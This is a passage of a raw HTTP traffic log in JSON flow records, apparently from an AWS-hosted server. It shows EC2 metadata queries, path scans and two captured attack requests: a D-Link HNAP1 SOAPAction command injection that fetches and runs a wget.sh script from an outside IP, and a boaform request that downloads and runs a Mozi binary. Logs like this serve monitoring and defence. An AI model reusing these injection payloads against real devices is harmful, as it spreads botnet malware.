HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJiiicOYLK24xTS3vdnCjFNF_QWAxJ9U3Vj2pnP7D-_zNg5jXQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":37298,"status":200,"time_taken":375,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T02:46:31.638376Z","timestamp":"2022-04-06T02:46:31.637048Z","bytes":1310,"bytes_in":18,"bytes_out":1292,"dest_content":"HTTP Status 400 – Bad Request

HTTP Status 400 – Bad Request


Type Status Report

Description The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 400 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1136\r\nDate: Wed, 06 Apr 2022 02:46:31 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1136,"flow_id":"7e0bd445-4f7f-4de2-b11b-6fdad0e092ae","http_comment":"HTTP/1.1 400 ","http_content_length":1136,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","src_headers":"GET / HTTP/1.1\r\n\r\n","src_ip":"177.55.157.36","src_mac":"02:A5:92:DA:49:85","src_port":5772,"status":400,"time_taken":202925,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T02:45:15.588967Z","timestamp":"2022-04-06T02:44:15.573193Z","bytes":1038,"bytes_in":357,"bytes_out":681,"cs_content_length":0,"dest_content":"\n\n\nError\n\n\n\n

An error occurred.

\n

Sorry, the page you are looking for is currently unavailable.
\nPlease try again later.

\n

If you are the system administrator of this resource then you should check\nthe error log for details.

\n

Faithfully yours, nginx.

\n\n\n","dest_headers":"HTTP/1.1 504 Gateway Time-out\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 02:45:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 497\r\nConnection: keep-alive\r\nETag: \"61cb4edc-1f1\"\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":497,"flow_id":"17b3f9b5-3def-4b4d-b4ec-23c2016c126e","http_comment":"HTTP/1.1 504 Gateway Time-out","http_content_length":497,"http_content_type":"text/html","http_method":"POST","http_user_agent":"Mozila/5.0","mime_type":"text/html","protocol_stack":"ip:tcp:http:soap","request":"POST /HNAP1/ HTTP/1.1","server":"nginx/1.21.5","site":"35.84.123.246:80","src_headers":"POST /HNAP1/ HTTP/1.1\r\nHost: 35.84.123.246:80\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://194.31.98.191/wget.sh;chmod 777 wget.sh;sh wget.sh dlink;rm -rf wget.sh`\"\r\nContent-Length: 0\r\n\r\n","src_ip":"64.31.7.230","src_mac":"02:A5:92:DA:49:85","src_port":36446,"status":504,"time_taken":60049648,"transport":"tcp","uri":"/HNAP1/","uri_path":"/HNAP1/"} {"endtime":"2022-04-06T02:44:15.505922Z","timestamp":"2022-04-06T02:43:15.492263Z","bytes":723,"bytes_in":42,"bytes_out":681,"dest_content":"\n\n\nError\n\n\n\n

An error occurred.

\n

Sorry, the page you are looking for is currently unavailable.
\nPlease try again later.

\n

If you are the system administrator of this resource then you should check\nthe error log for details.

\n

Faithfully yours, nginx.

\n\n\n","dest_headers":"HTTP/1.1 504 Gateway Time-out\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 02:44:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 497\r\nConnection: keep-alive\r\nETag: \"61cb4edc-1f1\"\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":497,"flow_id":"3f03fee0-525e-4cd8-895d-0e03b622d4a9","http_comment":"HTTP/1.1 504 Gateway Time-out","http_content_length":497,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"nginx/1.21.5","site":"35.84.123.246:80","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:80\r\n\r\n","src_ip":"64.31.7.230","src_mac":"02:A5:92:DA:49:85","src_port":39328,"status":504,"time_taken":60047356,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T02:43:49.652616Z","timestamp":"2022-04-06T02:43:49.386661Z","bytes":205,"bytes_in":205,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":133,"flow_id":"d448a216-b481-4cf2-b9a5-54ecbb2c5705","form_data":"username=adminisp&psd=adminisp","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0","src_content":"20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n","src_headers":"GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0\r\n\r\n","src_ip":"103.170.92.15","src_mac":"02:A5:92:DA:49:85","src_port":34182,"time_taken":531914,"transport":"tcp","uri":"/boaform/admin/formLogin?username=adminisp&psd=adminisp","uri_path":"/boaform/admin/formLogin","uri_query":"username=adminisp&psd=adminisp"} {"endtime":"2022-04-06T02:40:15.832694Z","timestamp":"2022-04-06T02:40:15.832694Z","bytes":191,"bytes_in":191,"bytes_out":0,"cs_content_length":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"bd733e3e-5280-4b9d-b06c-20f70a1ee875","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246:80","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:80\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\r\nContent-Length: 0\r\n\r\n","src_ip":"36.89.118.25","src_mac":"02:A5:92:DA:49:85","src_port":52959,"time_taken":207195,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T02:33:01.601193Z","timestamp":"2022-04-06T02:33:01.601193Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"5296691c-a97d-4d1c-ba36-bead77d8d9ca","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":46660,"time_taken":167771,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T02:20:28.002372Z","timestamp":"2022-04-06T02:20:28.001047Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 02:20:28 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"1dd0c883-f9ac-4969-b968-bdb385c3d811","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.61.184.91","src_mac":"02:A5:92:DA:49:85","src_port":37080,"status":404,"time_taken":87284,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T02:15:50.842471Z","timestamp":"2022-04-06T02:15:50.842471Z","bytes":238,"bytes_in":238,"bytes_out":0,"cs_content_length":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"05847391-f1d1-4cc2-9d90-299fb8689175","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246","src_headers":"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\r\nContent-Length: 0\r\nHost: 35.84.123.246\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\n\r\n","src_ip":"84.241.1.183","src_mac":"02:A5:92:DA:49:85","src_port":25791,"time_taken":262819,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T02:11:42.450230Z","timestamp":"2022-04-06T02:11:42.449911Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 02:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"f04f8a1c-d02c-473a-bf9c-21f59a2edeba","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KDkIWPWS6Q6l-pn37lZdhM9jOVi85ZZMxQcmck_xZeWGA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":30070,"status":404,"time_taken":331,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T02:11:42.449409Z","timestamp":"2022-04-06T02:11:42.448936Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 01:18:02 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 02:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"e9ec73f5-d037-4009-abfc-342703092837","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KCF5m4b0i9vs9BP2y0HfqBxoV2c8wfOFdD6SyVAqQ57VQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":30068,"status":200,"time_taken":492,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T02:06:16.057461Z","timestamp":"2022-04-06T02:06:16.055979Z","bytes":1430,"bytes_in":175,"bytes_out":1255,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /manager/html

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 02:06:16 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"aa247d4b-8332-46db-bd50-ba518ad938b5","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.179.91.168","src_mac":"02:A5:92:DA:49:85","src_port":45200,"status":404,"time_taken":195894,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T02:02:06.081449Z","timestamp":"2022-04-06T02:02:06.081271Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 02:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"1152991b-b3c8-4a84-827a-668bcdb21010","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVRorSyLxtg_Pnwm56i08-K-Cj7YppRAn-CH_QIQbdOu4w==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":47058,"status":404,"time_taken":193,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T02:02:06.080805Z","timestamp":"2022-04-06T02:02:06.080577Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 01:01:30 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 02:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"1880250d-72cc-472c-bd79-021b55f0dc47","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVS1tjpXji3MANwBhSt_wyPZXvDwTmPGE7xgkwqbRd2opA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":47056,"status":200,"time_taken":260,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T02:01:59.872070Z","timestamp":"2022-04-06T02:01:59.871667Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 02:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"bacabf84-c6b5-4cec-8946-5f23e78273c3","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09WiViH8hFV4lyplO-LP7NHqTW8lfup9BeJkiBPS5iPPrQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":35832,"status":404,"time_taken":428,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T02:01:59.870901Z","timestamp":"2022-04-06T02:01:59.870540Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 01:24:40 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 02:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"0d4322a1-d470-4161-a783-8f13f3664926","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAMHr09VOF1BL7x0NyXaYZbON2WsM-Z1qkaWfGchcMfNC4DtPOA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":35830,"status":200,"time_taken":409,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T01:56:54.543993Z","timestamp":"2022-04-06T01:56:54.542871Z","bytes":2286,"bytes_in":192,"bytes_out":2094,"cs_content_length":0,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 01:56:54 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"c754fdbd-5578-4481-9f75-e9326dd8e4a9","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\r\nContent-Length: 0\r\n\r\n","src_ip":"103.119.24.110","src_mac":"02:A5:92:DA:49:85","src_port":40953,"status":200,"time_taken":277373,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T01:11:42.449973Z","timestamp":"2022-04-06T01:11:42.449782Z","bytes":773,"bytes_in":246,"bytes_out":527,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 01:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"4c317306-0d14-45f0-bdcd-014e0b47229f","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KDkIWPWS6Q6l-pn37lZdhM9jOVi85ZZMxQcmck_xZeWGA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":28606,"status":404,"time_taken":201,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T01:11:42.449352Z","timestamp":"2022-04-06T01:11:42.448916Z","bytes":497,"bytes_in":236,"bytes_out":261,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 10800\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 00:17:10 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 01:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"bf155573-be16-404b-a9de-5da7af95d421","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAFBF9KCF5m4b0i9vs9BP2y0HfqBxoV2c8wfOFdD6SyVAqQ57VQ==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":28604,"status":200,"time_taken":452,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T01:02:06.080785Z","timestamp":"2022-04-06T01:02:06.080560Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 01:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"58dcf1f6-3123-484a-aa19-695a704057e0","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAP1CRVRorSyLxtg_Pnwm56i08-K-Cj7YppRAn-CH_QIQbdOu4w==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":48204,"status":404,"time_taken":238,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T01:02:06.080010Z","timestamp":"2022-04-06T01:02:06.079737Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 01:01:30 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 01:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"bf30fde9-8932-4297-bead-07a26c959f4e","http_comment":"HTTP/1.1 200 